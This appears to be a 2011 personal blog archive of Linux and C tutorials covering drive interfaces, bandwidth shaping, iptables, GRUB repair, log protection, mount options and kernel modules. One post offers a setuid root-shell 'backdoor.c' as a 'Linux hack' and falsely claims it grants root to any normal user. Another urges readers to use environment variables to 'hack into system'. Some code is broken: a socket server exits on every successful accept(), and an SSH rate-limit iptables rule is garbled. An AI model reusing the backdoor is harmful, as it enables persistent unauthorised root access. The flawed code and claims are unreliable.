PoiNtEr->: 2011

                             Difference between a dream and an aim. A dream requires soundless sleep, whereas an aim requires sleepless efforts.

Search This Blog

Thursday, December 29, 2011

Understanding ATA,SATA And SCSI

ATA (Advanced Technology Attachment)– a 16-bit parallel interface used for controlling computer drives. Introduced in 1986, it has undergone many evolutions in the last 18+ years, with the latest version being called ATA-7. Wherever an item is referred to as being an ATA device, it is commonly a Parallel ATA device. ATA devices are also commonly called IDE, EIDE, Ultra-ATA, Ultra-DMA, ATAPI, PATA, etc. (each of these acronyms actually do refer to very specific items, but are commonly interchanged)

IDE HDD




SATA (Serial Advanced Technology Attachment)– a 1-bit serial evolution of the Parallel ATA physical storage interface.
Starting with SATA, it extends the capabilities of ATA and offers transfer rates starting at 150MB/s and, after years of development, has moved to the mainstream of disk interfaces. The successor the SCSI interface is SAS at speeds of up to 3Gb/s. Additionally, it also addresses parallel interface issues such as drive addressability and limitations on the number of device per port connection.
SATA 




SCSI
Short for small computer system interface, a parallel interface standard used by Apple Macintosh computers, PCs and many UNIX systems for attaching peripheral devices to computers. Nearly all Apple Macintosh computers, excluding only the earliest Macs and the recent iMac, come with a SCSI port for attaching devices such as disk drives and printers. SCSI interfaces provide for data transmission rates (up to 80 megabytes per second). In addition, you can attach multiple devices to a single SCSI port, so that SCSI is really an I/O bus rather than simply an interface.



Cables & Connectors:Another big advantage of SATA over ATA is the cabling and connectors. The serial interface reduces the amount of wires needed to transmit data, making for much smaller cable size and making it easier to route and install SATA devices. The IDE cables used in parallel ATA systems are bulkier than Serial ATA cables and can only extend to 40cm long, while Serial ATA cables can extend up to one meter. In addition to the cabling, a new design of connectors is also used that reduces the amount of crosstalk between the wires, and the connector design also provides easier routing and better air flow.
26-inch Internal
SCSI Cable
                  
                         External SCSI4 Cable
                                 
SATA Internal
Power Splitter Cable
 Serial
ATA Drive
Connection Cable

Monday, December 26, 2011

Controlling Bandwidth in Linux (ubuntu) using Trickle



Trickle is a portable lightweight userspace bandwidth shaper. It can run in collaborative mode (together with trickled) or in stand alone mode.
trickle works by taking advantage of the unix loader preloading. Essentially it provides, to the application, a new version of the functionality that is required to send and receive data through sockets. It then limits traffic based on delaying the sending and receiving of data over a socket. trickle runs entirely in userspace and does not require root privileges.

To install trickle in Ubuntu:


sudo apt-get install trickle


To start Firefox with a limit to the amount of bandwidth it consumes all you have to do is type in the command line.


trickle -d 200 firefox
this would start Firefox with a download limit of 200KB/s.

Traffic Control Using TC In Linux(ubuntu)



In the absence of infinite bandwidth there will always be a need to hand out capacity accord-
ing to rules. Traditionally this has been a main reason to add non-IP technology to a network,
like ATM or frame relay. Since IP is steadily taking over the world, Linux is well placed to
play a role in enabling IP to take over traffic controlling functions from other technologies.


What is qdisc??
• Queueing Discipline(qdisc) :An algorithm that manages the queue of a device, either in-
coming (ingress) or outgoing (egress).
• Classless qdisc A qdisc with no configurable internal subdivisions.

• Classful qdisc A classful qdisc contains multiple classes. Each of these classes
contains a further qdisc, which may again be classful, but need not be.

Some Important Available Queueing Disciplines

• pfifo_fast

• Token Bucket Filter(TBF)
• Stochastic Fairness Queueing
• Prio
• CBQ
• Hierarchical Token Bucket(HTB)



Token Bucket (TB){Analogy Used in Shaping Traffic}

A token bucket is nothing but a common algorithm used to control the amount of data that is injected into a network, allowing for bursts of data to be sent. It is used for network traffic shaping or rate limiting. With token bucket you can define the maximum rate of traffic allowed on an interface at a given moment in time.
                                      tokens/sec
                                   |   |
                                   |  | Bucket to
                                   |  | to hold b tokens
                             +======+=====+
                                          |
                                          |
        |                                \|/
Packets |      +============+
stream  | ---> | token wait | --->  Remove token  --->  eth0
        |      +============+
  1. The TB filter puts tokens into the bucket at a certain rate.
  2. Each token is permission for the source to send a specific number of bits into the network.
  3. Bucket can hold b tokens as per shaping rules.
  4. Kernel can send packet if you've a token else traffic need to wait.
Tc is used to configure Traffic Control in the Linux kernel. Traffic Control consists of the following:
SHAPING
When traffic is shaped, its rate of transmission is under control. Shaping may be more than lowering the available bandwidth - it is also used to smooth out bursts in traffic for better network behaviour. Shaping occurs on egress.
SCHEDULING
By scheduling the transmission of packets it is possible to improve interactivity for traffic that needs it while still guaranteeing bandwidth to bulk transfers. Reordering is also called prioritizing, and happens only on egress.
POLICING
Where shaping deals with transmission of traffic, policing pertains to traffic arriving. Policing thus occurs on ingress.
DROPPING
Traffic exceeding a set bandwidth may also be dropped forthwith, both on ingress and on egress.
Processing of traffic is controlled by three kinds of objects: qdiscs, classes and filters.



 
Example Problem: We have two customers, A and B, both connected to the internet via eth0. We want to allocate 60 kbps to B and 40 kbps to A. Next we want to subdivide A's bandwidth 30kbps for WWW and 10kbps for everything else. Any unused bandwidth can be used by any class which needs it (in proportion of its allocated share).



tc qdisc add dev eth0 root handle 1: htb default 12

This command attaches queue discipline HTB to eth0 and gives it the "handle" 1:. This is just a name or identifier with which to refer to it below. The default 12 means that any traffic that is not otherwise classified will be assigned to class 1:12



tc class add dev eth0 parent 1: classid 1:1 htb rate 100kbps ceil 100kbps 
tc class add dev eth0 parent 1:1 classid 1:10 htb rate 30kbps ceil 100kbps
tc class add dev eth0 parent 1:1 classid 1:11 htb rate 10kbps ceil 100kbps
tc class add dev eth0 parent 1:1 classid 1:12 htb rate 60kbps ceil 100kbps



The first line creates a "root" class, 1:1 under the qdisc 1:. The definition of a root class is one with the htb qdisc as its parent. A root class, like other classes under an htb qdisc allows its children to borrow from each other, but one root class cannot borrow from another.




We also have to describe which packets belong in which class. This is really not related to the HTB qdisc.


tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 \
   match ip src 1.2.3.4 match ip dport 80 0xffff flowid 1:10
tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 \
   match ip src 1.2.3.4 flowid 1:11
(We identify A by its IP address which we imagine here to be 1.2.3.4.)
u32 is a filter that matches on IP destination port 80 *exactly* and send it to band 1:10 and 1:11.



Thursday, December 22, 2011

Disable Traceroute(tracert) using iptables

To disable traceroute coming from Linux box (tested on ubuntu 11.0 4):
# iptables -t filter -A OUTPUT -p icmp -m icmp --icmp-type port-unreachable -j DROP






























And to disable traceroute coming from Windows box (tested on Windows7):
# iptables -t filter -A OUTPUT -p icmp -m icmp --icmp-type echo-reply -j DROP

Tuesday, December 20, 2011

HACKER's Diary 3

Protect Yourself From DDOS and Brute Force Attacks using IPTABLES in linux

The Linux firewall is called iptables. Iptables is very powerful and features include :
1:Filtering - (blocking unwanted traffic). You can filter incoming and outgoing traffic by user, group, time/date, or service (application).
2:NAT (Routing). If your computer has two or more network cards (or if you are using virtualization) you can use a spare computer as a router, one network card connected to the Internet and the other to your LAN with iptables monitoring and filtering traffic.
3:Logging (monitoring) network traffic.
4:Block brute force or DOS attacks.




Block Brute Force attempts (SSH or other connections)
1:iptables -A INPUT -p tcp -m tcp --dport 22 -m tcp -m state --state NEW -m recent --set --name SSH --rsource
2:iptables -A INPUT -p tcp -m tcp --dport 22 -m recent --update --seconds 600 --hitcount 8 --rttl 3:name SSH --rsource -j DROP
iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT










 DOS ATTACKS:
In Dos attack generally Attacker tries to flood the victim with large number of packets using hping3.
The Internet Control Message Protocol (ICMP) has many messages that are identified by a "type" field. You need to use 0 and 8 ICMP code types.
1:Zero (0) is for echo-reply
2:Eight (8) is for echo-request.

iptables -A OUTPUT -p icmp --icmp-type echo-request -j DROP  
OR 
iptables -A OUTPUT -p icmp --icmp-type 8 -j DROP

Socket Programming in C



//Simple Hello Server





#include<stdio.h>


#include<stdlib.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<errno.h>
#include<string.h>
main()
{
    int sock,cli;
    unsigned int len;
    char mesg[]= "Hello to the World to Socket Programming";
   int sent;
   
   //socket 
    struct sockaddr_in server,client;
    if((sock = socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("socket: ");
        exit(-1);
        
    }
    server.sin_family = AF_INET;
    server.sin_port = htons(9335);
    server.sin_addr.s_addr = INADDR_ANY;
    bzero(&server.sin_zero,8);
    len = sizeof(struct sockaddr_in);
    
    
    
 //bind   
    
    
    if ((bind(sock,(struct sockaddr *)&server,len ))== -1)
    {
        perror("bind");
        exit(-1);
        
    }
    
   
   
   
   //listen
    if((listen(sock,5))== -1)


{    
    perror("listen");
    exit(-1);
}






//accept


while(1)
{
    if((cli =accept(sock,(struct sockaddr *)&client,&len)))


{
perror("accept");
exit(-1);
}




sent=send(cli,mesg,strlen(mesg),0);






printf("sent %d bytes to client : %s\n",sent,inet_ntoa(client.sin_addr));
close(cli);
}
}











WORDS YOU NEED FOR A GOOD VOCABULARY



English is tough stuff





Dearest creature in creation,
Study English pronunciation.
I will teach you in my verse
Sounds like corpse, corps, horse, and worse.
I will keep you, Suzy, busy,
Make your head with heat grow dizzy.
Tear in eye, your dress will tear.




So shall I! Oh hear my prayer.
Just compare heart, beard, and heard,
Dies and diet, lord and word,
Sword and sward, retain and Britain.
(Mind the latter, how it's written.)
Now I surely will not plague you
With such words as plaque and ague.
But be careful how you speak:
Say break and steak, but bleak and streak;
Cloven, oven, how and low,
Script, receipt, show, poem, and toe.


Hear me say, devoid of trickery,
Daughter, laughter, and Terpsichore,
Typhoid, measles, topsails, aisles,
Exiles, similes, and reviles;
Scholar, vicar, and cigar,
Solar, mica, war and far;
One, anemone, Balmoral,
Kitchen, lichen, laundry, laurel;
Gertrude, German, wind and mind,
Scene, Melpomene, mankind.


Billet does not rhyme with ballet,
Bouquet, wallet, mallet, chalet.
Blood and flood are not like food,
Nor is mould like should and would.
Viscous, viscount, load and broad,
Toward, to forward, to reward.
And your pronunciation's OK
When you correctly say croquet,
Rounded, wounded, grieve and sieve,
Friend and fiend, alive and live.



Ivy, privy, famous; clamour
And enamour rhyme with hammer.
River, rival, tomb, bomb, comb,
Doll and roll and some and home.
Stranger does not rhyme with anger,
Neither does devour with clangour.
Souls but foul, haunt but aunt,
Font, front, wont, want, grand, and grant,
Shoes, goes, does. Now first say finger,
And then singer, ginger, linger,
Real, zeal, mauve, gauze, gouge and gauge,
Marriage, foliage, mirage, and age.


Query does not rhyme with very,
Nor does fury sound like bury.
Dost, lost, post and doth, cloth, loth.
Job, nob, bosom, transom, oath.
Though the differences seem little,
We say actual but victual.
Refer does not rhyme with deafer.
Foeffer does, and zephyr, heifer.
Mint, pint, senate and sedate;
Dull, bull, and George ate late.
Scenic, Arabic, Pacific,
Science, conscience, scientific.


Liberty, library, heave and heaven,
Rachel, ache, moustache, eleven.
We say hallowed, but allowed,
People, leopard, towed, but vowed.
Mark the differences, moreover,
Between mover, cover, clover;
Leeches, breeches, wise, precise,
Chalice, but police and lice;
Camel, constable, unstable,
Principle, disciple, label.


Petal, panel, and canal,
Wait, surprise, plait, promise, pal.
Worm and storm, chaise, chaos, chair,
Senator, spectator, mayor.
Tour, but our and succour, four.
Gas, alas, and Arkansas.
Sea, idea, Korea, area,
Psalm, Maria, but malaria.
Youth, south, southern, cleanse and clean.
Doctrine, turpentine, marine.


Compare alien with Italian,
Dandelion and battalion.
Sally with ally, yea, ye,
Eye, I, ay, aye, whey, and key.
Say aver, but ever, fever,
Neither, leisure, skein, deceiver.
Heron, granary, canary.
Crevice and device and aerie.



Face, but preface, not efface.
Phlegm, phlegmatic, ass, glass, bass.
Large, but target, gin, give, verging,
Ought, out, joust and scour, scourging.
Ear, but earn and wear and tear
Do not rhyme with here but ere.
Seven is right, but so is even,
Hyphen, roughen, nephew Stephen,
Monkey, donkey, Turk and jerk,
Ask, grasp, wasp, and cork and work.


Pronunciation -- think of Psyche!
Is a paling stout and spikey?
Won't it make you lose your wits,
Writing groats and saying grits?
It's a dark abyss or tunnel:
Strewn with stones, stowed, solace, gunwale,
Islington and Isle of Wight,
Housewife, verdict and indict.


Finally, which rhymes with enough --
Though, through, plough, or dough, or cough?
Hiccough has the sound of cup.
My advice is to give up!!!

(Apparently excerpted from The Chaos by Gerard Nolst Trenité.)

REPAIR GRUB2

REPAIR GRUB2 AFTER WINDOW7 INSTALLATION 










1:sudo -i



2:fdisk -l
output:
Disk /dev/sda: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000080

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1           12750       19458    53882881    5  Extended
/dev/sda2              13        7650    61337600    7  HPFS/NTFS
/dev/sda3   *        7651       12749    40957717+   7  HPFS/NTFS
/dev/sda5           12750       19458    53882880   83  Linux

so linux is installed in sda5 as you can see above.



3:mount /dev/sda5 /mnt

4:mount /dev/sda5 /mnt/boot            #skip this one if not have a separate /boot partition

5:grub-install --root-directory=/mnt/ /dev/sda

6:sudo reboot

voila your dead ubuntu is up !!!



Friday, December 9, 2011

Download already buffered youtube video ubuntu11.04


1:file /proc/*/fd/* 2>/dev/null | grep Flash | cut -f1 -d:

output:/proc/12631/fd/17

Now go to this path and that's it voila we are done :-)







2: cp $(file /proc/*/fd/* 2>/dev/null | grep Flash | cut -f1 -d: | head -n 1) VideoName.avi  

Above command will save this video in your current working directory ....

Wednesday, November 23, 2011

Hacker’s Diary “10”

 

Hack 5 Protect Your Logs from Tampering

So Welcome guys to second section of hacker’s diary .So today we see how we can protect our log files.

By the time you must be thinking why it is important to protect log file ??

well an attacker more likely leave telltale sign of his action in various logs.This is a very valuable audit that should be protect so that it can help us to figure out how the attacker got in

,or where the attack came from .

So the big question is if Attacker gains ROOT privileges then how to stop him from removing the  traces of his misbehavior?

One useful attribute for protecting log files is append-only. When this attribute is set, the file cannot be deleted, and writes are only allowed to append to the end of the file.

To set the append-only flag under Linux, run this command:

# chattr +a filename

Obviously, an intruder who has gained root privileges could realize that file attributes are being used and just remove the append-only flag

from our logs by running chattr -a. To prevent this, we need to disable the ability to remove the append-only attribute. To accomplish this

under Linux, use its capabilities mechanism.

power_up_linux_with_sysctl_var_optimization

The Linux capabilities model divides up the privileges given to the all-powerful root account and allows you to selectively disable them. In order to prevent a user from removing the append-only attribute from a file, we need to remove the CAP_LINUX_IMMUTABLE capability. When present in the running system, this capability allows the append-only attribute to be modified. To modify the set of capabilities available to the system, we will use a simple utility called lcap (http://packetstormsecurity.org/linux/admin/lcap-0.0.3.tar.bz2).

To unpack and compile the tool, run this command:

# tar xvfj lcap-0.0.3.tar.bz2 && cd lcap-0.0.3 && make

Then, to disallow modification of the append-only flag, run:

# ./lcap CAP_LINUX_IMMUTABLE

# ./lcap CAP_SYS_RAWIO

The first command removes the ability to change the append-only flag, and the second command removes the ability to do raw I/O. This is needed so that the protected files cannot be modified by accessing the block device they reside on. It also prevents access to /dev/mem and /dev/kmem, which would provide a loophole for an intruder to reinstate the CAP_LINUX_IMMUTABLE capability. To remove these capabilities at boot, add the previous two commands to your system startup scripts (e.g., /etc/rc.local). You should ensure that capabilities are removed late in the boot order, to prevent problems with other startup scripts. Once lcap has removed kernel capabilities, they can be reinstated only by rebooting the system.


Note:lcap only work for linux kernel version <2.6.But I am still trying to figure out a way through which I can make it work for new kernel versions also.If you have any idea please share here.

Wednesday, November 16, 2011

Memory Representation Of int data type in C Language

In computer science, an integer is a datum of integral data type, a data type which represents some finite subset

of the mathematical integers. Integral data types may be of different sizes and may or may not be allowed to contain

negative values.Int may be signed or unsigned both have different memory representation.numbers are represented in binary

only without extra symbols, requiring a method of encoding the minus sign. The four best-known methods of extending the binary

numeral system to represent signed numbers are: sign-and-magnitude, ones' complement, two's complement, and excess-K.
1. Memory representation of:

unsigned int a=7;


It is 16-bit data type and all 16 bits are data bit. Well we are here assuming that our microprocessor uses

little-endian method.So before moving any further first have a look on Endianness.


Memory representation:



 

23

Note: same memory representation will be of:

unsigned short int a=7;

 

 

 

 

 

2. Memory representation of:

int a=7 or signed int a=7;


It is 16 bit data type.
15 bit: data bit
1 bit: signed bit
Binary equivalent of 7 is 111
for 16 bit we will add 13 zero in the left side i.e. 00000000 00000111
Here
A is 00000111
B is 00000000


Memory representation:


signed p int

Note: same memory representation will be of:

short int a=7 or signed short int a=7;

 

 

 

 

 


3. Memory representation of :

int a= -7 or signed int a= -7;


It is 16 bit data type.
Binary equivalent of 7 is 111
for 16 bit we will add 13 zero in the left side i.e. 00000000 00000111
since a is negative number so it will first convert in the 2’s complement format before stored in the memory.

1’s Complement of a: 11111111 11111000

+ 1

______________________

2’s Complement of a: 11111111 11111001


Memory representation:



signed n int

Note: same memory representation will be of:

short int a=-7 or signed short int a=-7


Reference:


1:http://cquestionbank.blogspot.com


2:http://c-pointer.blogspot.com


3:http://en.wikipedia.org/wiki/Signed_number_representations

Tuesday, November 15, 2011

Hacker’s Diary 1

Secure Mount Point

WassUp guys !!…Well I am studying too many things about network security and Operating system so I decided to share

that with everyone .So the main aim of my hacker’s diary series is to tell people ways to remain more secure and surf internet freely without any fear of getting attacked .And everyone know what is networking …its all computer coming together and sharing things…with some sharing…and some stealing..  this is one of my own definition but still I don’t have any copy write on that .

so lets start with hard drive. We all known most of our data is stored in our hard drives and it is the primary way of interacting with a unix (or window) machine.So it is desirable to limit what a intruder (I) can access (Open-mouthed smile) if he gains access on your computer.

So one easy way of doing that is  the use of restrictive mount point.

A mount option is a flag that controls how the filesystem may be accessed. It is passed to the operating system kernel's code when the filesystem is brought online. Mount options can be used to prevent files from being interpreted as device nodes, to disallow binaries from being executed, and to disallow the SUID bit from taking affect (by using the nodev, noexec, and nosuid flags). Filesystems can also be mounted read-only with the ro option.

These options are specified from the command line by running mount with the -o flag. For example, if you have a separate partition for /tmp that is on the third partition of your first IDE hard disk, you can mount with the nodev, noexec, and nosuid flags, which are enabled by running the following command:

# mount -o nodev,noexec,nosuid /dev/hda3 /tmp

An equivalent entry in your /etc/fstab would look something like this:

/dev/hda3 /tmp ext3 defaults,nodev,noexec,nosuid 1 2

There are a number of ways that an attacker can still circumvent these mount restrictions. For example, the noexec option on Linux can be bypassed by using /lib/ld-linux.so to execute binaries residing on such filesystems. At first glance, you'd think that this can be remedied by making ld-linux.so nonexecutable, but this would render all dynamically linked binaries unexecutable. So, unless all of the programs you rely on are statically linked (they're probably not), then the noexec option is of little use in Linux. In addition, an attacker who has already gained root privileges will not be significantly hampered by filesystems mounted with special options, since these can often be remounted with the -o remount option. But by using mount flags, you can easily limit the possible attacks available to a hostile user before he gains root privileges

.IRIX.filesystem

Tuesday, November 8, 2011

Know your Google meme.

check out these awesome tweaks by Google...
Do a barrel roll - http://bit.ly/uT7a9E
Google Sphere - http://bit.ly/uXfgyO
Epic Google - http://bit.ly/uGANwB
Google Gravity - http://bit.ly/nLGzd1
Tilt - http://bit.ly/vNtlSn
Google Loco - http://bit.ly/urU8vW
Google Gothic - http://bit.ly/v2VhZm
Google Pacman - http://bit.ly/s1nNin
Google Guitar - http://bit.ly/uiJKH1
Google Pirate - http://bit.ly/tNQmEa
Google Rainbow - http://bit.ly/uNc4cy
Google Reverse - http://bit.ly/vL87YT

Saturday, November 5, 2011

Types of Shell in Linux



Shells plays an important role in Linux and Unix system. Everything that is happening on your distro is either because of the shell or the kernel. Moreover, a backend  shell is initialized as soon as you made a login . There are lots of shells in the Unix and Linux system. Let’s try to know more about them :

What is a shell ?

Shell is the software installed on your system that works as command-line interpreter i.e. it takes the commands you type, interpret them and gives them to operating system (kernel) through system calls to execute. There are many different shells available to choose from in Linux.

C Shell : C shell was created by Bill Joy, while he was studying at University of California, Berkeley. He released it under BSD license, the syntax of C shell is similar to C programming language hence the name C shell.

TC Shell: An improved version of C shell, provides some additional features like command line completion and editing. In most of Linux systems /bin/csh is linked to /bin/tcsh and it alternatives, so when you try to start the C shell, TC shell gets started.

C shell linked to its alternatives

Korn Shell (ksh): Korn shell was developed by David Korn at AT&T Bell Laboratories. It contains may features of C shell and Bourne shell.

Bourne Shell(sh): The default shell in many Unix systems developed by Stephen Bourne of AT&T Bell Laboratories.

GNU Bourne-Again Shell (bash): Bash shell is default shell in most of Linux distributions. Its a free and open source clone of bourne shell. It was developed by Brian Fox for the GNU project. Its the most feature rich shell available and is compatible with bourne shell.

To find out all the shells installed on your system type “$cat /etc/shells”. Your default shell is defined /etc/passwd file.

To switch to a different shell on your system just type the name of that shell (as in /etc/shells) and hit enter.


Z Shell(zsh):  Well The Z shell (zsh) is a Unix shell that can be used as an interactive login shell and as a powerful command interpreter for shell scripting. Zsh can be thought of as an extended Bourne shell with a large number of improvements, including some features of bash, ksh, and tcsh. It includes features like automated spell correction, editing  multiple line command within a single buffer and many more.

Finally My shell....

Vishal Mishra…..I am Back !

Its been a long time since I blogged something actually I got busy with my work but now I am kind of free So my advance new Year resolution is “one post each day”..

Well I think when you are busy you should take out few second out of it to relax and think of things you had done and praise yourself for it ,it will give you

positive vibe to deal the further stress.NOw you all must be thinking  where heck  I was busy!! Well I am in final year of my graduation and now things are becoming tougher

which seem quite easy before and so many things are going around like placement,seminar,major project etc.So I can say that last year is really stressful for every graduate

and same is happening with me also …no big deal though .

Well so what I am up to these days ….

1:Making New Operating system in C

2: Giving  Seminar on Sixth sense technology {all credit to pranav mistry ,I did best I guess} 

               i-iz-busy-at-work-lookin-at-something-

3: Shell application to update facebook status

4:VGA Programming

5:Reading Intel X86 manuals

6:Learning Assembly language {all hacker’s must try this}

7:TCP/IP programming

8:Last but not least Blogging also from now On…..

 

So soon i ‘ll be updating about these things so keep looking and if you have  any query I will be glad to ans that …

Wednesday, September 14, 2011

Resume Format

                              
This is to inform all 4th year student of Institute of Engineering & Technology that please submit your Resume latest by 15 sept 2011 .
Resume format is attached here....click here
Date of Off-campus :21september 2011
venu:Meerut University




your sincerely
Vishal Mishra
Training & Placement Representative
Computer Science & Engg.
                  

Sunday, August 14, 2011

How to create soft link with ln command in linux

To make links between files you need to use ln command. A symbolic link (also known as a soft link or symlink) consists of a special type of file that serves as a reference to another file or directory. Unix/Linux like operating systems often uses symbolic links.
Two types of links

There are two types of links

    symbolic links: Refer to a symbolic path indicating the abstract location of another file
    hard links : Refer to the specific location of physical data.
                           


                            

How do I create soft link / symbolic link?

To create a symbolic link in Unix or Linux, at the shell prompt, enter the following command:
ln -s {target-filename} {symbolic-filename}

For example create softlink for /home/vishal/Desktop/syllabi.pdf as /home/vishal/study/syllabi1.pdf, enter the following command:
ln -s /home/vishal/Desktop/syllabi.pdf  /home/vishal/study/syllabi1.pdf
ls -l /home/vishal/Desktop/syllabi.pd
f


Output:

lrwxrwxrwx 1 vishal  vishal    16 2011-08-12 22:53 syllabi1.pdf -> /home/vishal/Desktop/syllabi.pdf

Saturday, August 13, 2011

My first linux kernel module ...Hello World!!


Hi guys.Today we are going to learn something about kernels.we will install a module in our linux operating system .Before doing that i request you to please google out difference between microkernel and monolithic kernel.My question is why we are interested in kernels ???
I think very obvious answer of this question is if you know every basic thing about your system and how it is implemented then you can screw it very easily..
SO now time for little warning if your love your laptop then think before trying this ,no their is no harm ...but the probability of going something wrong is much higher because you are dealing with the Heart {core} of system .



The module_init() macro defines which function is to be called at module insertion time (if the file is compiled as a module), or at boot time: if the file is not compiled as a module the module_init() macro becomes equivalent to __initcall(), which through linker magic ensures that the function is called on boot.
The function can return a negative error number to cause module loading to fail (unfortunately, this has no effect if the module is compiled into the kernel). For modules, this is called in user context, with interrupts enabled, and the kernel lock held, so it can sleep.

This module_exit() macro defines the function to be called at module removal time (or never, in the case of the file compiled into the kernel). It will only be called if the module usage count has reached zero. This function can also sleep, but cannot fail: everything must be cleaned up by the time it returns.


Code: hello_world.c


#include <linux/kernel.h>

#include <linux/module.h>

#include <linux/init.h>

#include <linux/version.h>

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("This is a my First Test Module...!");
MODULE_AUTHOR("Vishal Mishra");


static int __init my_start_init(void){

        printk(KERN_INFO "Hello World module loaded...!\n");
        return 0;
}

static void __exit my_remove_exit(void){

        printk(KERN_INFO "Hello World module Un-loaded...!\n"); 

}

module_init(my_start_init);
module_exit(my_remove_exit);






Makefile:


obj-m   :=      hello_world.o

all:
        make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) modules

clear:    

        make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) clean



Now save above code as Makefile in same folder in which hello_world.c is present.




Now you can run following commands to get information about your newly installed module

1:modinfo hello_world.ko
2:lsmod  {this command will list all installed modules in your kernel and you can check whether hello_world is their or not }

For more on linux kernel module programming check out my new post which will explain each function  used above in detail here














Reference:
Tutorials - OSDev Wiki
 http://linuxpoison.blogspot.com/2008/01/want-to-write-linux-kernel.html
 http://linuxkernel51.blogspot.com/2011/03/lodable-kernel-module.html
http://tldp.org/LDP/lkmpg/2.6/html/index.html

Thursday, August 11, 2011

Printing the Execution Environment in C language

Enumerating all the variables in the environment is a little trickier.To do this, you
must access a special global variable named environ, which is defined in the GNU C
library.This variable, of type char**, is a NULL-terminated array of pointers to character
strings. Each string contains one environment variable, in the form VARIABLE=value.


#include<stdio.h>
extern char** environ;
int main()
{
char** var;
for(var = environ; *var !=NULL; ++var)
printf("%s\n",*var);
return 0;
}


output:            




Now you know each and every environment variable value ,you can use them to hack into system...try it !

Wednesday, August 10, 2011

How to Give normal user superuser privilege?..Linux Hack


#include<unistd.h>
#include<fcntl.h>                                              
main()
{
setuid(0);
char *name[2];
name[0] = "/bin/sh";
name[1] = 0x0;
execve(name[0], name, 0x0);
return 0;
}


save this file as backdoor.c and compile it then use its output file to get superuser privilege ..
thats it now run the output file from normal user account..
Vishal@Eva$./b      (suppose the name of output file is b)
$
now check your uid
$ id -u


0
Output "0" confirms that you have superuser privilege now .

Tuesday, August 9, 2011

How to Remove Linux kernel capabilities and make root handicap??

As you may know, Linux has capabilities. Maybe you don’t need all capabilities, if this is your case, you are in luck, since you can remove it using the lcap tool.
To list all Linux capabilities:
~# lcap
Current capabilities: 0xFFFDFCFF
   0) *CAP_CHOWN                     1) *CAP_DAC_OVERRIDE
   2) *CAP_DAC_READ_SEARCH           3) *CAP_FOWNER
   4) *CAP_FSETID                    5) *CAP_KILL
   6) *CAP_SETGID                    7) *CAP_SETUID
   8) *CAP_SETPCAP                   9) *CAP_LINUX_IMMUTABLE
  10) *CAP_NET_BIND_SERVICE         11) *CAP_NET_BROADCAST
  12) *CAP_NET_ADMIN                13) *CAP_NET_RAW
  14) *CAP_IPC_LOCK                 15) *CAP_IPC_OWNER
  16) *CAP_SYS_MODULE               17)  CAP_SYS_RAWIO
  18) *CAP_SYS_CHROOT               19) *CAP_SYS_PTRACE
  20) *CAP_SYS_PACCT                21) *CAP_SYS_ADMIN
  22) *CAP_SYS_BOOT                 23) *CAP_SYS_NICE
  24) *CAP_SYS_RESOURCE             25) *CAP_SYS_TIME
  26) *CAP_SYS_TTY_CONFIG           27) *CAP_MKNOD
  28) *CAP_LEASE                    29) *CAP_AUDIT_WRITE
  30) *CAP_AUDIT_CONTROL
    * = Capabilities currently allowed
 
 
                                
 
 
For example, I want to disable CAP_CHOWN, so I don’t want that any user (including root) has the possibility to change the file owner. So, in this case, the file is UNCHOWNABLE.
Usual way:
# touch filename
# chown vishal filename
Now the file is owned by vishal
My preferred way:
First, we remove CHOWN capability
(as root)
# lcap CAP_CHOWN
# touch filename
# chown vishal filename
chown: changing ownership of `filename’: Operation not permitted
As you can see, chown does not work as expected, since we have removed that capability. To restore it, you need to reboot.
You can disable any capability at your own risk ;)
This tool is interesting  with a few changes/updates and you are up with increase security, for example, to remove the possibility to load/unload a module use CAP_SYS_MODULE,  it helps a bit for rootkits,  for files that you don’t want to be modified in anyway, you can use CAP_LINUX_IMMUTABLE on /bin, /usr/bin, /sbin, /usr/sbin to have expected binaries (checksums). Try to play with any capabilitiy and see if is interesting for you.
For further info: man lcap
or click here


Ubuntu(Linux) Log files and usage

 

 Its really important some times to check log files whether you are working on your home system or on server etc.So lets see how we can do that in ubuntu (linux).Well this will work for most of linux distributions.First thing we must know is which log file contain what and where it is located on our system so that we can access it according to our need...

=> /var/log/messages or /var/log/syslog : General log messages
=> /var/log/boot : System boot log
=> /var/log/debug : Debugging log messages
=> /var/log/auth.log : User login and authentication logs
=> /var/log/daemon.log : Running services such as squid, ntpd and others log message to this file
=> /var/log/dmesg : Linux kernel ring buffer log
=> /var/log/dpkg.log : All binary package log includes package installation and other information
=> /var/log/faillog : User failed login log file
=> /var/log/kern.log : Kernel log file
=> /var/log/lpr.log : Printer log file
=> /var/log/mail.* : All mail server message log files
=> /var/log/mysql.* : MySQL server log file
=> /var/log/user.log : All userlevel logs
=> /var/log/xorg.0.log : X.org log file
=> /var/log/apache2/* : Apache web server log files directory
=> /var/log/lighttpd/* : Lighttpd web server log files directory
=> /var/log/fsck/* : fsck command log
=> /var/log/apport.log : Application crash report / log file




View log files using GUI tools using the GNOME System Log Viewer

System Log Viewer is a graphical, menu-driven viewer that you can use to view and monitor your system logs. System Log Viewer comes with a few functions that can help you manage your logs, including a calendar, log monitor and log statistics display. System Log Viewer is useful if you are new to system administration because it provides an easier, more user-friendly display of your logs than a text display of the log file. It is also useful for more experienced administrators, as it contains a calendar to help you locate trends and track problems, as well as a monitor to enable you to continuously monitor crucial logs.
You can start System Log Viewer in the following ways:
Click on System menu > Choose Administration > Log file viewer:




(The GNOME System Log Viewer)
Note you can start the GNOME System Log Viewer from a shell prompt, by entering the following command:
$ gnome-system-log &

Monday, August 8, 2011

what does Ubuntu means???

Ubuntu is a South African ethical ideology focusing on people's allegiances and relations with each other. The word comes from the Zulu and Xhosa languages. Ubuntu is seen as a traditional African concept, is regarded as one of the founding principles of the new republic of South Africa and is connected to the idea of an African Renaissance.

A rough translation of the principle of Ubuntu is "humanity towards others". Another translation could be: "The belief in a universal bond of sharing that connects all humanity".


                                                             


